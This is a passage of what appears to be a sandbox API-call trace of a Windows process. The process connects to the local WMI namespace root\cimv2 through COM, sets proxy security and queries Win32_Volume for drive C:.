	[0242.150] CoGetContextToken (in: pToken=0x5eae730 | out: pToken=0x5eae730) returned 0x0
	[0242.150] WbemDefPath:IUnknown:AddRef (This=0x6260820) returned 0x2
	[0242.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x6260820, riid=0x5eae7ac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae7a8 | out: ppvObject=0x5eae7a8*=0x6260820) returned 0x0
	[0242.150] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x2
	[0242.150] WbemDefPath:IUnknown:AddRef (This=0x6260820) returned 0x3
	[0242.150] WbemDefPath:IWbemPath:SetText (This=0x6260820, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.150] WbemDefPath:IUnknown:Release (This=0x6260820) returned 0x2
	[0242.155] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae914 | out: puCount=0x5eae914*=0x2) returned 0x0
	[0242.160] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae910*=0x0, pszText=0x0 | out: puBuffLength=0x5eae910*=0x17, pszText=0x0) returned 0x0
	[0242.161] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae910*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae910*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.163] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae910 | out: puCount=0x5eae910*=0x2) returned 0x0
	[0242.163] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae90c*=0x0, pszText=0x0 | out: puBuffLength=0x5eae90c*=0x17, pszText=0x0) returned 0x0
	[0242.163] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae90c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae90c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.163] CoGetObjectContext (in: riid=0x2e5da34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae88c | out: ppv=0x5eae88c*=0x2d8dec) returned 0x0
	[0242.163] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae884 | out: pAptType=0x5eae884*=1) returned 0x0
	[0242.163] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2e5da1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae888 | out: ppvObject=0x5eae888*=0x0) returned 0x80004002
	[0242.163] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0242.164] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x5eae774 | out: lpiid=0x5eae774) returned 0x0
	[0242.164] CoGetClassObject (in: rclsid=0x382364*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae6dc | out: ppv=0x5eae6dc*=0x6260ad0) returned 0x0
	[0242.373] WbemLocator:IUnknown:QueryInterface (in: This=0x6260ad0, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae50c | out: ppvObject=0x5eae50c*=0x0) returned 0x80004002
	[0242.373] WbemLocator:IClassFactory:CreateInstance (in: This=0x6260ad0, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x6260bf0) returned 0x0
	[0242.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2e8 | out: ppvObject=0x5eae2e8*=0x6260bf0) returned 0x0
	[0242.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eae2a4 | out: ppvObject=0x5eae2a4*=0x0) returned 0x80004002
	[0242.374] WbemLocator:IUnknown:AddRef (This=0x6260bf0) returned 0x3
	[0242.374] CoGetContextToken (in: pToken=0x5eae130 | out: pToken=0x5eae130) returned 0x0
	[0242.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae118 | out: ppvObject=0x5eae118*=0x0) returned 0x80004002
	[0242.374] CoGetContextToken (in: pToken=0x5eae128 | out: pToken=0x5eae128) returned 0x0
	[0242.375] WbemLocator:IUnknown:AddRef (This=0x6260bf0) returned 0x4
	[0242.375] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae19c | out: ppvObject=0x5eae19c*=0x0) returned 0x80004002
	[0242.375] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x3
	[0242.375] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x2
	[0242.375] WbemLocator:IUnknown:Release (This=0x6260ad0) returned 0x0
	[0242.375] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x1
	[0242.375] CoGetContextToken (in: pToken=0x5eae634 | out: pToken=0x5eae634) returned 0x0
	[0242.375] CoGetContextToken (in: pToken=0x5eae5f4 | out: pToken=0x5eae5f4) returned 0x0
	[0242.375] WbemLocator:IUnknown:AddRef (This=0x6260bf0) returned 0x2
	[0242.375] WbemLocator:IUnknown:QueryInterface (in: This=0x6260bf0, riid=0x5eae670*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eae66c | out: ppvObject=0x5eae66c*=0x6260bf0) returned 0x0
	[0242.376] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x2
	[0242.376] WbemLocator:IUnknown:Release (This=0x6260bf0) returned 0x1
	[0242.376] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae864 | out: puCount=0x5eae864*=0x2) returned 0x0
	[0242.377] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=8, puBuffLength=0x5eae860*=0x0, pszText=0x0 | out: puBuffLength=0x5eae860*=0x17, pszText=0x0) returned 0x0
	[0242.377] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=8, puBuffLength=0x5eae860*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae860*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.377] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5eae33c | out: ppv=0x5eae33c*=0x6260c00) returned 0x0
	[0242.377] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6260c00, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5eae388 | out: ppNamespace=0x5eae388*=0x626d3c4) returned 0x0
	[0244.487] WbemLocator:IUnknown:QueryInterface (in: This=0x626d3c4, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae258 | out: ppvObject=0x5eae258*=0x3ae39c) returned 0x0
	[0244.488] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3ae39c, pProxy=0x626d3c4, pAuthnSvc=0x5eae2a0, pAuthzSvc=0x5eae29c, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4, pImpLevel=0x5eae290, pAuthInfo=0x5eae294, pCapabilites=0x5eae298 | out: pAuthnSvc=0x5eae2a0*=0xa, pAuthzSvc=0x5eae29c*=0x0, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4*=0x6, pImpLevel=0x5eae290*=0x2, pAuthInfo=0x5eae294, pCapabilites=0x5eae298*=0x1) returned 0x0
	[0244.488] WbemLocator:IUnknown:Release (This=0x3ae39c) returned 0x1
	[0244.488] WbemLocator:IUnknown:QueryInterface (in: This=0x626d3c4, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae24c | out: ppvObject=0x5eae24c*=0x3ae3bc) returned 0x0
	[0244.488] WbemLocator:IUnknown:QueryInterface (in: This=0x626d3c4, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae248 | out: ppvObject=0x5eae248*=0x3ae39c) returned 0x0
	[0244.488] WbemLocator:IClientSecurity:SetBlanket (This=0x3ae39c, pProxy=0x626d3c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.488] WbemLocator:IUnknown:Release (This=0x3ae39c) returned 0x2
	[0244.488] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x1
	[0244.488] CoTaskMemFree (pv=0x3acc90) 
	[0244.488] WbemLocator:IUnknown:Release (This=0x6260c00) returned 0x0
	[0244.488] WbemLocator:IUnknown:QueryInterface (in: This=0x626d3c4, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc08 | out: ppvObject=0x5eadc08*=0x3ae3bc) returned 0x0
	[0244.489] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadbc4 | out: ppvObject=0x5eadbc4*=0x0) returned 0x80004002
	[0244.494] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x0) returned 0x80004002
	[0244.502] WbemLocator:IUnknown:AddRef (This=0x3ae3bc) returned 0x3
	[0244.502] CoGetContextToken (in: pToken=0x5eada50 | out: pToken=0x5eada50) returned 0x0
	[0244.502] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eada38 | out: ppvObject=0x5eada38*=0x3ae31c) returned 0x0
	[0244.502] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ae31c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eada40 | out: pCid=0x5eada40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.502] WbemLocator:IUnknown:Release (This=0x3ae31c) returned 0x3
	[0244.503] CoGetContextToken (in: pToken=0x5eada48 | out: pToken=0x5eada48) returned 0x0
	[0244.503] WbemLocator:IUnknown:AddRef (This=0x3ae3bc) returned 0x4
	[0244.503] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadabc | out: ppvObject=0x5eadabc*=0x3ae3a4) returned 0x0
	[0244.503] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x4
	[0244.503] WbemLocator:IRpcOptions:Query (in: This=0x3ae3a4, pPrx=0x3ae3bc, dwProperty=2, pdwValue=0x5eadae0 | out: pdwValue=0x5eadae0) returned 0x80004002
	[0244.503] WbemLocator:IUnknown:Release (This=0x3ae3a4) returned 0x3
	[0244.503] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x2
	[0244.503] CoGetContextToken (in: pToken=0x5eadebc | out: pToken=0x5eadebc) returned 0x0
	[0244.503] CoGetContextToken (in: pToken=0x5eade7c | out: pToken=0x5eade7c) returned 0x0
	[0244.503] WbemLocator:IUnknown:AddRef (This=0x3ae3bc) returned 0x3
	[0244.503] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x5eadef8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eadef4 | out: ppvObject=0x5eadef4*=0x626d3c4) returned 0x0
	[0244.504] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x3
	[0244.504] WbemLocator:IUnknown:Release (This=0x626d3c4) returned 0x2
	[0244.504] WbemLocator:IUnknown:Release (This=0x626d3c4) returned 0x1
	[0244.504] CoGetContextToken (in: pToken=0x5eae7d8 | out: pToken=0x5eae7d8) returned 0x0
	[0244.504] WbemLocator:IUnknown:AddRef (This=0x3ae3bc) returned 0x2
	[0244.504] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae3fc | out: ppvObject=0x5eae3fc*=0x3ae3bc) returned 0x0
	[0244.505] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x2
	[0244.505] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x1
	[0244.505] CoGetContextToken (in: pToken=0x5eadfdc | out: pToken=0x5eadfdc) returned 0x0
	[0244.505] CoGetContextToken (in: pToken=0x5eadf9c | out: pToken=0x5eadf9c) returned 0x0
	[0244.505] WbemLocator:IUnknown:AddRef (This=0x3ae3bc) returned 0x2
	[0244.505] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae3bc, riid=0x5eae018*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eae014 | out: ppvObject=0x5eae014*=0x626d3c4) returned 0x0
	[0244.505] WbemLocator:IUnknown:Release (This=0x3ae3bc) returned 0x2
	[0244.505] WbemLocator:IUnknown:AddRef (This=0x626d3c4) returned 0x3
	[0244.505] IWbemServices:ExecQuery (in: This=0x626d3c4, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x5eae620 | out: ppEnum=0x5eae620*=0x626cb34) returned 0x0
	[0244.543] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2cc | out: ppvObject=0x5eae2cc*=0x626cb38) returned 0x0
	[0244.543] IClientSecurity:QueryBlanket (in: This=0x626cb38, pProxy=0x626cb34, pAuthnSvc=0x5eae314, pAuthzSvc=0x5eae310, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318, pImpLevel=0x5eae304, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c | out: pAuthnSvc=0x5eae314*=0xa, pAuthzSvc=0x5eae310*=0x0, pServerPrincName=0x5eae320, pAuthnLevel=0x5eae318*=0x6, pImpLevel=0x5eae304*=0x2, pAuthInfo=0x5eae308, pCapabilites=0x5eae30c*=0x1) returned 0x0
	[0244.543] IUnknown:Release (This=0x626cb38) returned 0x1
	[0244.543] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2c0 | out: ppvObject=0x5eae2c0*=0x3ae67c) returned 0x0
	[0244.543] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2bc | out: ppvObject=0x5eae2bc*=0x626cb38) returned 0x0
	[0244.543] IClientSecurity:SetBlanket (This=0x626cb38, pProxy=0x626cb34, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.561] IUnknown:Release (This=0x626cb38) returned 0x2
	[0244.561] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x1
	[0244.561] CoTaskMemFree (pv=0x3accc0) 
	[0244.562] WbemLocator:IUnknown:Release (This=0x626d3c4) returned 0x2
	[0244.562] IUnknown:QueryInterface (in: This=0x626cb34, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc78 | out: ppvObject=0x5eadc78*=0x3ae67c) returned 0x0
	[0244.562] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadc34 | out: ppvObject=0x5eadc34*=0x0) returned 0x80004002
	[0244.564] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadb28 | out: ppvObject=0x5eadb28*=0x0) returned 0x80004002
	[0244.566] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x3
	[0244.566] CoGetContextToken (in: pToken=0x5eadac0 | out: pToken=0x5eadac0) returned 0x0
	[0244.566] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadaa8 | out: ppvObject=0x5eadaa8*=0x3ae5dc) returned 0x0
	[0244.567] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ae5dc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eadab0 | out: pCid=0x5eadab0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0244.567] WbemLocator:IUnknown:Release (This=0x3ae5dc) returned 0x3
	[0244.567] CoGetContextToken (in: pToken=0x5eadab8 | out: pToken=0x5eadab8) returned 0x0
	[0244.567] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x4
	[0244.567] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadb2c | out: ppvObject=0x5eadb2c*=0x3ae664) returned 0x0
	[0244.567] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x4
	[0244.567] WbemLocator:IRpcOptions:Query (in: This=0x3ae664, pPrx=0x3ae67c, dwProperty=2, pdwValue=0x5eadb50 | out: pdwValue=0x5eadb50) returned 0x80004002
	[0244.567] WbemLocator:IUnknown:Release (This=0x3ae664) returned 0x3
	[0244.567] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x2
	[0244.567] CoGetContextToken (in: pToken=0x5eadf2c | out: pToken=0x5eadf2c) returned 0x0
	[0244.567] CoGetContextToken (in: pToken=0x5eadeec | out: pToken=0x5eadeec) returned 0x0
	[0244.567] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x3
	[0244.567] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x5eadf68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eadf64 | out: ppvObject=0x5eadf64*=0x626cb34) returned 0x0
	[0244.568] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x3
	[0244.568] IUnknown:Release (This=0x626cb34) returned 0x2
	[0244.568] IUnknown:Release (This=0x626cb34) returned 0x1
	[0244.568] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6260820, puCount=0x5eae8b8 | out: puCount=0x5eae8b8*=0x2) returned 0x0
	[0244.568] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae8b4*=0x0, pszText=0x0 | out: puBuffLength=0x5eae8b4*=0x17, pszText=0x0) returned 0x0
	[0244.568] WbemDefPath:IWbemPath:GetText (in: This=0x6260820, lFlags=4, puBuffLength=0x5eae8b4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae8b4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0244.568] CoGetContextToken (in: pToken=0x5eae254 | out: pToken=0x5eae254) returned 0x0
	[0244.568] CoGetContextToken (in: pToken=0x5eae214 | out: pToken=0x5eae214) returned 0x0
	[0244.568] WbemLocator:IUnknown:AddRef (This=0x3ae67c) returned 0x2
	[0244.568] WbemLocator:IUnknown:QueryInterface (in: This=0x3ae67c, riid=0x5eae290*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5eae28c | out: ppvObject=0x5eae28c*=0x626cb34) returned 0x0
	[0244.568] WbemLocator:IUnknown:Release (This=0x3ae67c) returned 0x2
	[0244.568] IUnknown:AddRef (This=0x626cb34) returned 0x3
	[0244.569] IEnumWbemClassObject:Clone (in: This=0x626cb34, ppEnum=0x5eae888 | out: ppEnum=0x5eae888*=0x626d464) returned 0x0
	[0244.576] IUnknown:QueryInterface (in: This=0x626d464, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x626d468) returned 0x0
	[0244.576] IClientSecurity:QueryBlanket (in: This=0x626d468, pProxy=0x626d464, pAuthnSvc=0x5eae58c, pAuthzSvc=0x5eae588, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590, pImpLevel=0x5eae57c, pAuthInfo=0x5eae580, pCapabilites=0x5eae584 | out: pAuthnSvc=0x5eae58c*=0xa, pAuthzSvc=0x5eae588*=0x0, pServerPrincName=0x5eae598, pAuthnLevel=0x5eae590*=0x6, pImpLevel=0x5eae57c*=0x2, pAuthInfo=0x5eae580, pCapabilites=0x5eae584*=0x1) returned 0x0
	[0244.576] IUnknown:Release (This=0x626d468) returned 0x1
	[0244.576] IUnknown:QueryInterface (in: This=0x626d464, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae538 | out: ppvObject=0x5eae538*=0x3adb44) returned 0x0
	[0244.576] IUnknown:QueryInterface (in: This=0x626d464, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae534 | out: ppvObject=0x5eae534*=0x626d468) returned 0x0
	[0244.576] IClientSecurity:SetBlanket (This=0x626d468, pProxy=0x626d464, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0244.585] IUnknown:Release (This=0x626d468) returned 0x2
	[0244.585] WbemLocator:IUnknown:Release (This=0x3adb44) returned 0x1
	[0244.585] CoTaskMemFree (pv=0x3acc60) 
	[0244.585] IUnknown:Release (This=0x626cb34) returned 0x2
	[0244.585] IUnknown:QueryInterface (in: This=0x626d464, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadee0 | out: ppvObject=0x5eadee0*=0x3adb44) returned 0x0
	[0244.586] WbemLocator:IUnknown:QueryInterface (in: This=0x3adb44, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eade9c | out: ppvObject=0x5eade9c*=0x0) returned 0x80004002
	[0244.589] WbemLocator:IUnknown:QueryInterface (in: This=0x3adb44, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadd90 | out: ppvObject=0x5eadd90*=0x0) returned 0x80004002
	[0244.592] WbemLocator:IUnknown:AddRef (This=0x3adb44) returned 0x3
